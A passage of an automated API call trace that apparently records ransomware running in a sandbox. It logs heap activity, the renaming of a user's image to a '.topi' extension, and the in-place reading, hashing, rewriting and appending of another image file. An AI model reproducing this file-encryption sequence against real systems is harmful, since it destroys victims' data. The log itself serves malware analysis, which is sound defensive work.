(HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.687] GetCurrentThreadId () returned 0x8c4 [0096.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ac0 [0096.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ad8 [0096.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4aa8 [0096.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.689] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.689] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\cAxSc7m83M.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\caxsc7m83m.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\cAxSc7m83M.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\caxsc7m83m.png.topi")) returned 1 [0096.690] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.690] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.690] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.691] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fa1db90, ftCreationTime.dwHighDateTime=0x1d5b63a, ftLastAccessTime.dwLowDateTime=0x170e5070, ftLastAccessTime.dwHighDateTime=0x1d5c3a2, ftLastWriteTime.dwLowDateTime=0x170e5070, ftLastWriteTime.dwHighDateTime=0x1d5c3a2, nFileSizeHigh=0x0, nFileSizeLow=0x15ea8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dsVuGwo_lw.bmp", cAlternateFileName="DSVUGW~1.BMP")) returned 1 [0096.691] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\dsVuGwo_lw.bmp") returned=".bmp" [0096.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\dsVuGwo_lw.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\dsvugwo_lw.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.692] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=89768) returned 1 [0096.692] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.695] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x15e82, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.695] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.696] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.697] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.697] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.697] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.697] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.697] GetLastError () returned 0x0 [0096.697] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.697] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.697] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.697] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.697] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.697] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.697] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x15eb0) returned 0x9a06a00 [0096.698] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.698] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02bd0 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a90 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02c18 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4aa8 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ad8 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4af0 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.698] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.698] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ad8 | out: hHeap=0x680000) returned 1 [0096.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4af0 | out: hHeap=0x680000) returned 1 [0096.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4af0 [0096.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4ad8 [0096.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.699] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4af0 | out: hHeap=0x680000) returned 1 [0096.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ad8 | out: hHeap=0x680000) returned 1 [0096.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.699] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.700] GetCurrentThreadId () returned 0x8c4 [0096.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f84f0 [0096.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.700] GetCurrentThreadId () returned 0x8c4 [0096.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.700] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.700] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ad8 [0096.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4af0 [0096.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ac0 [0096.701] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.701] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4b08 [0096.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0096.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ad8 | out: hHeap=0x680000) returned 1 [0096.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ad8 [0096.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.702] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.702] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ad8 | out: hHeap=0x680000) returned 1 [0096.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.703] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b08 | out: hHeap=0x680000) returned 1 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.703] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4af0 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ac0 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4aa8 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02c18 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.704] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.704] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x15ea3, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x15ea3, lpOverlapped=0x0) returned 1 [0096.705] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.705] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x15ea8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.705] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.705] HeapFree (in: 